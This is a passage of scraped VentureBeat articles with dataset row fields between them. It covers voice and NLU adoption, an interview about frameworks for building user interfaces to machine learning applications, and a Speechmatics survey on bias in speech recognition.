few years ago was only available to companies with millions upon millions of dollars to funnel into machine learning efforts is now available to everyone to integrate directly or via SaaS. While we aren’t seeing voice assistants in conference rooms, we are seeing the impact that they have had when new products that leverage NLU or voice recognition reduce customer support costs, make farm work easier, or provide coaching for revenue teams. For most, integrating voice and NLU is an iterative process. Customer support is often the best place to start as companies are likely to see an immediate reduction in costs when customers find their own answers to their questions without reaching out to a human. Another solid starting point is implementing sales tools like Chorus.ai or Gong, which will bring in more revenue. Successful projects focus on the areas where voice and NLU can make improvements to processes that are already in place, parlaying early wins to further investments and expansion down the line. Dustin Coates is Product and GTM Manager at Algolia , co-host of the VUX World podcast, and author of Voice Applications for Alexa and Google Assistant. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,165
2,021
"Building MLGUI, user interfaces for machine learning applications | VentureBeat"
"https://venturebeat.com/2021/07/19/building-mlgui-user-interfaces-for-machine-learning-applications"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Building MLGUI, user interfaces for machine learning applications Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Machine learning is eating the world, and spilling over to established disciplines in software, too. After MLOps, is the world ready to welcome MLGUI (Machine Learning Graphical User Interface)? Philip Vollet is somewhat of a data science celebrity. As the senior data engineer with KPMG Germany, Vollet leads a small team of machine learning and data engineers building the integration layer for internal company data, with access standardization for internal and external stakeholders. Outside of KPMG, Vollet has built a tool chain to find, process, and share content on data science, machine learning, natural language processing, and open source using exactly those technologies. While there are many social media influencers sharing perspectives on data science and machine learning, Vollet actually knows what he is talking about. While most focus on issues of model building and infrastructure scaling, Vollet also looks at the user view, or frameworks for building user interfaces for applications utilizing machine learning. We were intrigued to discuss with him how building these user interfaces is necessary to unlock AI’s true potential. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! The lifecycle of machine learning projects Vollet and his team build data and machine learning pipelines to analyze internal data and work on reports for KPMG’s management. They implement a layer enabling access to data and build applications to serve this goal. The first question to address when it comes to building user interfaces for machine learning applications is, are those applications different from traditional applications, and if yes, how? Vollet finds that most of the time there is not much difference. The reason is he applies the same steps to develop a machine learning product that he also does for “regular” software development projects. Vollet also spoke about his method of approaching software development projects. The steps taken are as follows: It starts with budgeting, and then people allocation. Based on the project’s budget, the project is staffed. Then the project has to be brought into KPMG’s DevOps environment. Consequently, sprints are planned, stakeholders are consulted, and the project’s implementation life cycle starts. Seen at this level of abstraction, every software project looks the same. Continuous integration / continuous delivery is another good DevOps practice that Vollet’s team applies. What is different in projects that involve machine learning is that there are more artifacts to manage. Crucially, there are datasets and models, and evolution in both of those is very real: “It’s possible that today a model fits perfectly into our needs, but in six months we have to re-evaluate it,” Vollet said. MLOps , anyone? So at which point does a user interface come into play in machine learning projects? The brief answer is, as soon as possible. Generally, Vollet considers having stakeholders in the loop as early as the first iteration, because they can familiarize themselves with the project and their feedback can be incorporated early on. Having a good user interface is needed, because if we only show people code snippets, it’s too abstract, Vollet said: “With a Graphical User Interface , people can get an idea of what’s happening. Having an interface changes everything, because it’s easier for people to understand what’s happening. Most of the time, machine learning is really abstract. So we have an input, there’s a workflow, and then we have the end result. If you have a user interface, you can directly show the impact of what you are doing.” Building user interfaces for machine learning applications What are the key criteria to be considered when choosing a framework to build a user interface for machine learning applications? For Vollet’s team, the ability to run on premise, in KPMG’s own cloud, is the top priority. For many projects in KPMG, it’s a requirement. Then comes charting. The different types of charts and diagrams that each user interface framework supports is one of the most important parameters. Then, it also has to be easy to use and to fit in their technology stack. For Vollet, this means “something that the operations team can support.” If it’s in the list of supported frameworks, there does not have to be an extra request and extra time both for the operations and the development team to familiarize themselves with the framework. There are many tools they use, and they keep testing new ones. The market for frameworks to help build user interfaces for machine learning projects is growing. New players appear and old ones evolve. The big question is what are the frameworks of choice for Vollet, the ones his team usually works with. Vollet’s default option is Streamlit , “because it’s super easy. You have features like a date picker. Also, you can have a front-end with a file upload, which business analysts can use as a front end to upload their Excel files or CSV, then do some adjustments.” For something a bit more advanced, Vollet’s choice is Gradio : “It’s more focused for machine learning. There are so many features built into it in a short time. You can run it on Jupyter notebooks, or on Google Colab. It’s super-integrated and it’s cool, I highly recommend it.” Plotly with Dash is another option Vollet thinks highly of. Dash’s promise is to enable users to build and deploy analytic web apps using Python, R, and Julia. No JavaScript or DevOps are required. Plotly is a framework built to leverage Dash. This one is more suitable for enterprises, as it needs infrastructure to run on, but it has good charting support, Vollet said. Last but not least, there’s what Vollet called the new kid on the block, Panel. It’s a high-level application and dashboarding solution for Python. Panel works with visualizations from Bokeh , Matplotlib , HoloViews , and many other Python plotting libraries, making them instantly viewable either individually or when combined with interactive widgets that control them. MLGUI: The art and science of developing GUIs for machine learning applications Besides those open source frameworks, there were some additional honorable mentions by Vollet. One of those was Deepnote. Deepnote is not a user interface framework per se. Rather, it is touted as a new kind of data science notebook , Jupyter-compatible with real-time collaboration and running in the cloud. As notebooks also have visualization capabilities, it may be relevant too. Another tool Vollet mentioned was Gooey. It’s the kind tool more used for having a user interface for a Python application, or script. It’s not so much a charting library people use for building a user interface for machine learning applications, although it can be used for that. Integration seems to be centered around data science notebooks. When using Google Colab, for example, you can use Gradio and Plotly, so they are integrated in some sense, said Vollet. If you want full stack integration, then perhaps you are better off with Dash, he added. Another interesting question is the degree to which those frameworks offer some flavor of MLOps support. If a new feature gets added to a machine learning model, would those frameworks be able to pick it up and use it, or would this have to be done manually? Gradio can do this, at least to some extent; in other frameworks, this would be a manual process, Vollet said. Our takeaway is that MLGUI is another burgeoning domain adjacent to data science and machine learning. Like MLOps is the application of the DevOps principles and practices to the special needs that arise from developing machine learning at scale, we would argue MLGUI is the rise. It’s the otherwise well-known art and science of developing GUIs for applications, with the twist of applying it to applications utilizing machine learning. Even though that’s not a category in and of its own at this point, perhaps it should be. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,166
2,022
"Report: 29% of execs have observed AI bias in voice technologies | VentureBeat"
"https://venturebeat.com/2022/02/14/report-29-of-execs-have-observed-ai-bias-in-voice-technologies"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Report: 29% of execs have observed AI bias in voice technologies Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. According to a new report by Speechmatics , more than a third of global industry experts reported that the COVID-19 pandemic affected their voice tech strategy , down from 53% in 2021. This shows that companies are finding ways around obstacles that seemed impassable less than two years ago. The last two years have exacerbated the adoption of emerging technologies, as companies have leveraged them to support their dispersed workforces. Speech recognition is one that’s seen an uptick: over half of companies have successfully integrated voice tech into their business. However, more innovation is needed to help the technology reach its full potential. Many were optimistic in their assumption that by 2022, the pandemic would be in the rearview mirror. And though executives are still navigating COVID-19 in their daily lives, the data indicates that they’ve perhaps found some semblance of normal from a business perspective. However, there are hurdles the industry must overcome before voice technology can reach its full potential. More than a third (38%) of respondents agreed that too many voices are not understood by the current state of voice recognition technology. What’s more, nearly a third of respondents have experienced AI bias , or imbalances in the types of voices that are understood by speech recognition. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! There are significant enhancements to be made to speech recognition technology in the coming years. Demand will only increase due to factors such as further developments in the COVID-19 pandemic, demand for AI-powered customer services and chatbots, and more. But while it may be years until this technology can understand each and every voice, incremental strides are still being made in these early stages, and speech-to-text technology is on its way to realizing its full potential. Speechmatics collated data points from C-suite, senior management, middle management, intermediate and entry-level professionals from a range of industries and use cases in Europe, North America, Africa, Australasia, Oceania, and Asia. Read the full report by Speechmatics. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "